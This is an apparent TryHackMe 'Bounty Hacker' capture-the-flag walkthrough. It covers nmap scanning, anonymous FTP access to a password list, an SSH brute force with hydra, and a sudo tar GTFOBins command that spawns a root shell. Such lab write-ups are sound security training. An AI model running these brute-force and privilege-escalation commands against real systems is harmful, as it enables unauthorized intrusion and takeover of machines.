TryHackMe: Bounty Hacker

1. Deploy the machine.

2. Find open ports on the machine

Port scan

nmap -Pn <ip>

There’re 3 open ports: 21,22,80.

OS and service scan

nmap -A -p 21,22,80 <ip>

The OS is Ubuntu.

There’re 3 services:

21 ftp with anonymous login.
22 ssh 
80 http

Vuln scan

nmap --script vuln -p 21,22,80 <ip>

Access HTTP site (port 80)

There’re 3 name: spike, jet, and ed.

Let’s note it for possible usernames.

View page source. There’s /images/ directory.

Access it. nothing much

Access ftp port 21 with anonymous login

ftp <ip>
Name: anonymous

ls -la

There’re 2 files: locks.txt and task.txt.

Download it

get locks.txt
get task.txt

Read it

cat locks.txt

Seems like this is a password file.

Read task.txt

cat task.txt

3. Who wrote the task list?
The answer is from task.txt
ANS: l*n

4. What service can you bruteforce with the text file found?

Seems like there’s another possible username.

Let’s create users.txt first. There’re 5 usernames in total.

Bruteforce SSH on port 22

hydra -L users.txt -P locks.txt <ip> ssh -t 4 -u -F -V

SSH can be bruteforced.

5. What is the users password?
ANS: The answer is from #4.

6. user.txt

ssh lin@<ip>

ls -la
cat user.txt

7. root.txt

Let’s do privilege escalation. I will check sudo first

sudo -l

Lucky enough I can use tar.

Looking up in GTFO

tar | GTFOBins

Run the command

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Let’s verify if I can escalate the priv.

id

Now I’m root.

cd /root
ls
cat root.txt